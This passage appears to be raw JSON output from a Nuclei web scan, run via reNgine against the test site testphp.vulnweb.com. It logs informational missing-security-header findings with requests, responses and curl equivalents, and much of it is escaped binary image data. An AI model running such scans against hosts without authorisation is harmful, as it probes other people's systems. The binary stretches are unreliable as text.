dU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:46.239187506Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:47.330686197Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd 